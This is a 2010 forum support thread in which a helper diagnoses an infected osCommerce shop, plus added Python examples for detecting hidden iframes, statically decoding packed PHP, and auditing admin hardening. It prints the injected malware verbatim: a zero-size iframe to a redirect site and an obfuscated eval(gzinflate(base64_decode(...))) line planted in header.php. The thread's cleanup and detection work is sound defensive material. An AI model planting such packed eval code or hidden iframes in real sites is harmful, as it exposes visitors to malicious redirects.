gcap Posted May 19, 2010

Hi, Avast is saying my site www.brentwoodnursery.co.za/\{gzip} has traces of html:iframe-inf. I have spoken to my host, who says that the site has not been hacked. I did install an add-on to allow me to run a list of my products. The problem is that on my PC at work it doesn't issue any warning and I can't find any infected text or trace of the text 'iframe' in any index.php or index.html files. I have just launched the site and look really silly with new customers being told that the site is dangerous. I don't know where to find this infected text or how to erase this annoying issue.
germ Posted May 19, 2010

From your HTML source:

<!-- header //-->
<iframe src="http://CoinUrlRedirection.com/x/?src=dg&id=20492" width="0" height="0" scrolling="no" frameborder="0"></iframe><!-- header_eof //-->

Looks like it's in /includes/header.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
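An added example, not code from this thread: one way to flag hidden iframes like the one quoted above in a page's fetched HTML source. The sample page, the host names and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (placeholder hosts), shaped like the snippet quoted above.
SAMPLE_HTML = """<html><body>
<!-- header //-->
<iframe src="http://redirector.example.invalid/x/?id=1" width="0" height="0" scrolling="no" frameborder="0"></iframe><!-- header_eof //-->
<iframe src="/shop/map.html" width="400" height="300"></iframe>
<iframe src="http://tracker.example.invalid/p" style="display:none"></iframe>
</body></html>"""

def is_zero(value):
    """True for sizes such as '0', '0px' or '0%'; False when absent."""
    try:
        return float((value or "").strip().lower().rstrip("px%")) == 0
    except ValueError:
        return False

class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line, src, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if is_zero(a.get("width")) or is_zero(a.get("height")):
            reasons.append("zero-size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if not reasons:
            return  # visible frames are left alone
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if host and host != self.site_host:
            reasons.append("off-site")
        self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

def audit_html(html, site_host):
    """Return every invisible iframe found in the page source."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings

if __name__ == "__main__":
    for line, src, reasons in audit_html(SAMPLE_HTML, "shop.example.invalid"):
        print(f"line {line}: {src} [{', '.join(reasons)}]")
```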
gcap Posted May 19, 2010

Thank you ever so much. Can I ask you two things?

1. How did you find it so quickly?
2. What should I delete from here?

<?php
/*
  $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/
eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

// check if the 'install' directory exists, and warn of its existence
  if (WARN_INSTALL_EXISTENCE == 'true') {
    if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {
      $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');
    }
  }

// check if the configure.php file is writeable
  if (WARN_CONFIG_WRITEABLE == 'true') {
    if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {
      $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning');
    }
  }

// check if the session folder is writeable
  if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') {
    if (STORE_SESSIONS == '') {
      if (!is_dir(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning');
      } elseif (!is_writeable(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning');
      }
    }
  }

// check session.auto_start is disabled
  if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) {
    if (ini_get('session.auto_start') == '1') {
      $messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning');
    }
  }

  if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) {
    if (!is_dir(DIR_FS_DOWNLOAD)) {
      $messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning');
    }
  }

  if ($messageStack->size('header') > 0) {
    echo $messageStack->output('header');
  }
?>
germ Posted May 19, 2010

Evil code:

eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

:o

I have a program I wrote on the site I manage that I can tell it to visit any web page and it writes the source code of that web page to a text file so I can examine it.

Very useful and written just for this purpose. :)
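An added example, not code from this thread: a scanner that finds the eval(gzinflate(base64_decode('...'))) wrapper shown above in PHP source and unpacks the blob statically, so the hidden code can be read without ever being executed. The sample file it builds is constructed and harmless, and all function names are assumptions of this example.

```python
import base64
import re
import zlib

# Matches the wrapper quoted above: eval(gzinflate(base64_decode('...')));
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1",
    re.IGNORECASE,
)


def php_gzinflate(b64_text):
    """Reverse base64_decode + gzinflate; nothing is evaluated."""
    raw = base64.b64decode(b64_text, validate=False)
    # PHP's gzinflate() takes a raw DEFLATE stream, hence wbits=-15.
    return zlib.decompressobj(-15).decompress(raw, 1_000_000)  # cap output size


def scan_source(text):
    """Return (line_number, decoded_text or None) for every wrapper found."""
    hits = []
    for m in WRAPPER.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        try:
            decoded = php_gzinflate(m.group(2)).decode("utf-8", "replace")
        except (ValueError, zlib.error):
            decoded = None  # wrapper present but blob damaged; still report it
        hits.append((line, decoded))
    return hits


def make_sample():
    """Constructed test input: a harmless string packed the same way."""
    inner = b'echo "<!-- constructed sample, not the code from the thread -->";'
    packer = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(packer.compress(inner) + packer.flush()).decode()
    return "<?php\n/* header.php */\neval(gzinflate(base64_decode('%s')));\n?>\n" % blob


if __name__ == "__main__":
    for line, decoded in scan_source(make_sample()):
        print(f"line {line}: packed eval, decodes to: {decoded!r}")
```

Running scan_source over every .php file in a shop's directory tree shows which files carry the wrapper, which is quicker than searching for the word 'iframe', since the iframe only exists after the blob is unpacked.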
gcap Posted May 19, 2010

Listen, that nearly cost me my business and certainly set us back a bit, so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasn't hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you.
germ Posted May 19, 2010

> Listen, that nearly cost me my business and certainly set us back a bit, so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasn't hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you.

You need to protect your admin with a .htaccess file - ASAP.

In the admin remove file_manager.php and define_language.php - both are extreme security risks.

And read the "How to secure your site" thread in this section of the forum.
gcap Posted May 19, 2010

Delete file_manager.php and define_language.php? Any negatives to doing this? What exactly is a .htaccess file?
germ Posted May 20, 2010

> Delete file_manager.php and define_language.php? Any negatives to doing this? What exactly is a .htaccess file?

Obviously you wouldn't be able to use said files, but they aren't necessary for shop operation.

The file manager is a text editor (a faulty one at times). Better to use the one in your host's cPanel or use FTP.

I'm not sure what the define language file is for? :unsure:

Search the web about .htaccess

It adds another layer of protection to the admin.

Both of the files I mentioned have security issues that allow a hacker to bypass your admin login screen and access these files in a harmful fashion. That's probably how the rogue code got there to begin with.
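An added example, not code from this thread: a small audit that checks whether the hardening steps recommended above are still outstanding for an admin directory. The two file names are the ones named in the thread; the directory layout, the .htpasswd path and the rule that "protected" means file-based password authentication are assumptions of this example.

```python
import os
import tempfile

# The two file names come from the thread; the admin directory path is an assumption.
RISKY_ADMIN_FILES = ("file_manager.php", "define_language.php")


def htaccess_enforces_auth(path):
    """True if .htaccess sets up file-based password auth on uncommented lines."""
    directives = {}
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for raw in fh:
                parts = raw.strip().split(None, 1)
                if parts and not parts[0].startswith("#"):
                    value = parts[1].lower() if len(parts) > 1 else ""
                    directives.setdefault(parts[0].lower(), []).append(value)
    except OSError:
        return False  # a missing or unreadable file protects nothing
    # "Require all granted" lets everyone in, so only user-restricting forms count.
    restricted = any(v.split()[:1] in (["valid-user"], ["user"], ["group"])
                     for v in directives.get("require", []))
    return "authtype" in directives and "authuserfile" in directives and restricted


def audit_admin(admin_dir):
    """List the hardening steps from the thread that are still outstanding."""
    findings = ["remove " + name for name in RISKY_ADMIN_FILES
                if os.path.isfile(os.path.join(admin_dir, name))]
    if not htaccess_enforces_auth(os.path.join(admin_dir, ".htaccess")):
        findings.append("add password-protecting .htaccess")
    return findings


def demo():
    """Audit a constructed admin directory before and after the fixes."""
    with tempfile.TemporaryDirectory() as admin:
        for name in RISKY_ADMIN_FILES + ("index.php",):
            open(os.path.join(admin, name), "w").close()
        with open(os.path.join(admin, ".htaccess"), "w") as fh:
            fh.write("# AuthType Basic\nRequire all granted\n")
        before = audit_admin(admin)
        for name in RISKY_ADMIN_FILES:
            os.remove(os.path.join(admin, name))
        with open(os.path.join(admin, ".htaccess"), "w") as fh:
            fh.write('AuthType Basic\nAuthName "Admin"\n'
                     "AuthUserFile /placeholder/path/.htpasswd\nRequire valid-user\n")
        return before, audit_admin(admin)
```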
Archived
This topic is now archived and is closed to further replies.